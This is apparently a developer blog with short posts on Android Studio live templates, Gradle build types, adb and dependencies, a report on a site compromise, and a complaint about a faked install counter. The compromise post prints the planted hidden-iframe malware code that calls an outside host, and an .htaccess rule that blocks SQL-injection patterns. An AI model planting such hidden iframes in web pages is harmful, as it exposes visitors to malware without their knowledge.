Live Templates: Logging with Android Studio

Android Studio comes with some pre-packaged Live Templates to make writing code fast. There are some logcat specific live templates that you could use in your classes to quickly write  code for logging. Below are some of the logging methods that I find invaluable.

  1.  logt (create TAG):
    TAG
  2. logm (Log.d  for method call including parameter):logm
  3. loge (Log.e):loge

The same can be done for logi,logv,logr.  I don’t know about you. These have saved me a couple of keystrokes…and extra libraries just for logging.  You can even create your own Live Templates if you want.

Random Android Gradle Tip: Different Icon per BuildType

Say you want to tell if the version of your installed app is a debug or release version just by looking at the icon on your device. Quick way to do this is to leverage Gradle’s Build type concept.
Build types allow you to create different versions of the same app from the same project. All projects have by default, a debug and release build type. If you want to have a different debug icon from your release icon.

All you have to do is create your launcher icon (debug version) and instead of placing the drawables in the main source set you would install them in the debug source-set. When your project is built in debug mode it would use the matching assets in the debug folder instead of the assets in main source folder. When you build the release version it will use the assets in the release folder if it exists or use the default ones in the main source set. This also holds for build variants.

[1] http://tools.android.com/tech-docs/new-build-system/user-guide#TOC-Build-Variants

 

Random Android Tip: ADB (Android Debug Bridge)

The Android Debug Bridge (adb) is a powerful tool that allows you to communicate with a connected device. One of my favorite features is the ability to start an Activity , BroadcastReceivers or Service while passing intent parameters to it, all from command line.
e.g starting an activity takes the form:

adb shell am start  -n “[your package name here]/[your activity path here]”

Take a look at the attached gist to see how you can do this.

[1] https://gist.github.com/ckurtm/ea4ba85c1dfc7be4a43b
[2] http://developer.android.com/tools/help/shell.html

Marking your Activities,Services and Receivers as exported in your app manifest might not be something you want to do in a production app as it might be a security risk if you do not wish to share you app info with any other app.

Random Android Gradle Tip: App dependencies

If you need to see the dependency tree for your project you can run:
./gradlew :app:dependencies
and
./gradlew :app:androidDependencies
if you need to solve a conflict you could either exclude the conflicting module or use a resolution strategy to force a particular version of the library to be used .

 

Html Injection

malware
Yesterday I got a message from google about my adwords account having been suspended. Reason being a suspected malware infection on my site. I Then checked my site code and realised that yes i had been compromised the code below had somehow been added to my php files:

<div style=”display:none”><iframe width=415 height=797 src=”http://age-inf.ru:8080/index.php” ></iframe></div><div style=”display:none”></div><div style=”display:none”>

From the above, it seems this loads a page in the background within an iframe without the users consent, i dont even want to know what happens when you load that url. Anyway for those of you who might find themselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

RewriteCond %{QUERY_STRING} ^.*(;|<|>|’|”|)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* – [F]

Some people are suggesting playing around with mod_rewrite but I’m not too sure if thats the safest way to deal with it. One question remains, how was the html injected in the first place?

Klicknation Lies

http://klicknation.com/
So here i was going through this add i got through this site i found through google ads, Klicknation. I figured I’d go through the site since they seem to have a ‘catchy’ name. They have this installation counter on front page like the one i’ve attached. so me being as curios as i was , wanted to find out how they update their ‘installs’ counter coz i remember firefox has one too. I went through the site code and they slapped on a simple javascript counter that just randomly comes up with a number. Those are not installs ,its just a number generated from the date. code below, Shame on you!!!:

var date = new Date().getTime()/1000;
var count = Math.round(7103455+(date-1234398246)/9);
function addCommas(x1)
{
var rgx = /(d+)(d{3})/;
while (rgx.test(x1)) {
x1 = x1.replace(rgx, ‘$1’ + ‘,’ + ‘$2’);
}
return x1;
}
function inccount()
{
count = count + 1;
out = document.getElementById(‘counter’);
out.innerHTML = addCommas(count.toString());
}
window.setInterval(inccount, 5000);